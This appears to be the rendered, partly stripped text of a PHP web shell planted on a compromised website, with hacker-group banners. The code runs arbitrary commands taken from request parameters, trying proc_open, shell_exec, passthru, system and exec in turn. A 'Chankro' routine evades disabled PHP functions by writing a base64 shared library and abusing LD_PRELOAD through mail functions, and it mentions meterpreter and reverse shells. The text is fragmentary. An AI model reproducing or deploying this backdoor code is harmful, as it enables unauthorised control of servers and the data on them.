WASAWHOOOOO LOPYUUUUU SOMAC !!!

WASAWHOOOOO
Open Shell"; } else { echo "[X] Upload failed bro."; } } ?> JAWAra HoreG Sound

JAWAra HoreG Sound

GET fallback: ?bgsley&c=whoami

array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"), ); $shell = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? 'cmd.exe' : 'sh'; $process = @proc_open($shell, $descriptorspec, $pipes); if (is_resource($process)) { $line = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? $command . "\r\n" : $command . " 2>&1\n"; fwrite($pipes[0], $line); fclose($pipes[0]); $output = stream_get_contents($pipes[1]); fclose($pipes[1]); $error = stream_get_contents($pipes[2]); fclose($pipes[2]); proc_close($process); $out = trim((string)$output); $err = trim((string)$error); if ($out !== '' || $err !== '') { return $out !== '' ? $out : $err; } } } if (!$blocked('shell_exec')) { $out = @shell_exec($command . ' 2>&1'); if ($out !== null && $out !== '') { return $out; } } if (!$blocked('passthru')) { ob_start(); @passthru($command . ' 2>&1', $code); $out = ob_get_clean(); if ($out !== false && $out !== '') { return $out; } if ($code !== 0) { return "exit code: $code"; } } if (!$blocked('system')) { ob_start(); @system($command . ' 2>&1', $code); $out = ob_get_clean(); if ($out !== false && $out !== '') { return $out; } } if (!$blocked('exec')) { $lines = array(); $code = 0; @exec($command . ' 2>&1', $lines, $code); if (!empty($lines)) { return implode("\n", $lines); } } return "All command execution functions are disabled or failed."; } if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["command"])) { $command = trim((string)$_POST["command"]); if ($command !== '') { $result = execute_command_with_proc_open($command); echo "

crot awhhhhhh

"; echo "
" . htmlspecialchars($result, ENT_QUOTES, 'UTF-8') . "
"; } } elseif (isset($_GET['c']) && trim((string)$_GET['c']) !== '') { $command = trim((string)$_GET['c']); $result = execute_command_with_proc_open($command); echo "

crot awhhhhhh

"; echo "
" . htmlspecialchars($result, ENT_QUOTES, 'UTF-8') . "
"; } ?> BypasChankro Sley

CHANKRO COMMAND BYPASS
@ SLEY

test.txt"); $viewCommandResult = '

Result: base64 : ' . $meterpreter .'
If no output appears,
please check manually by opening '.$full_url.'
Or u can check command with reverse shell script
Powered By @ HaxorSec

'; $a($full . '/chankro.so', $base($hook)); $a($full . '/acpid.socket', $base($meterpreter)); $p('CHANKRO=' . $full . '/acpid.socket'); $p('LD_PRELOAD=' . $full . '/chankro.so'); if(function_exists('mail')) { $m('a','a','a','a'); echo $viewCommandResult; $is_https = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443; $host = $_SERVER['HTTP_HOST']; $script_path = $_SERVER['SCRIPT_NAME']; $new_path = str_replace(basename($script_path), 'test.txt', $script_path); $full_url = ($is_https ? 'https://' : 'http://') . $host . $new_path; $content = file_get_contents($full_url); echo $content; } elseif(function_exists('mb_send_mail')) { $mb('a','a','a','a'); echo $viewCommandResult; $is_https = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443; $host = $_SERVER['HTTP_HOST']; $script_path = $_SERVER['SCRIPT_NAME']; $new_path = str_replace(basename($script_path), 'test.txt', $script_path); $full_url = ($is_https ? 'https://' : 'http://') . $host . $new_path; $content = file_get_contents($full_url); echo $content; } elseif(function_exists('error_log')) { $err('a',1,'a'); echo $viewCommandResult; $is_https = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443; $host = $_SERVER['HTTP_HOST']; $script_path = $_SERVER['SCRIPT_NAME']; $new_path = str_replace(basename($script_path), 'test.txt', $script_path); $full_url = ($is_https ? 'https://' : 'http://') . $host . $new_path; $content = file_get_contents($full_url); echo $content; } elseif(function_exists('imap_mail')) { $imp('a','a','a'); echo $viewCommandResult; $is_https = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443; $host = $_SERVER['HTTP_HOST']; $script_path = $_SERVER['SCRIPT_NAME']; $new_path = str_replace(basename($script_path), 'test.txt', $script_path); $full_url = ($is_https ? 'https://' : 'http://') . $host . $new_path; $content = file_get_contents($full_url); echo $content; } } ?>